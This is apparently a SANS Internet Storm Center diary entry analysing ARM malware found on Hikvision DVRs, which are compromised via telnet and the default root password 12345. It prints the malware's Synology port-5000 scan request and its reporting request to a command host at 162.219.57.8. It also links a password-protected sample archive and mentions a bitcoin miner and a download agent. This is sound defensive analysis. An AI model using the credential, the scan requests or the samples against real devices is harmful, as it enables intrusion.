Update:Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries. D72BNr, the bitcoin miner (according to the usage info based on strings) and mzkk8g, which looksl ike a simplar http agent, maybe to download additional tools easily (similar to curl/wget which isn't installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ).

Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) .

The malware resides in /dev/cmd.so . A number of additional suspect files where located in the /dev directory which we still need to recover / analyze from the test system. The compromisse of the DVR likely happened via an exposed telnet port and a default root password (12345).

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The http request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0

Host: [IP Address of the Target]:5000

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

- it then extracts the firmware version details and transmits them to 162.219.57.8. The request used for this reporting channel:

GET /k.php?h=%lu HTTP/1.0

Host: 162.219.57.8

User-Agent: Ballsack

Connection: close

So in short, this malware is just scanning for vulnerable devices, and the actual exploit will likely come later.